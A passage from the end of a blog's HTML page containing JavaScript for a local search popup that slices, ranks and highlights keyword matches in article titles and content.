                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
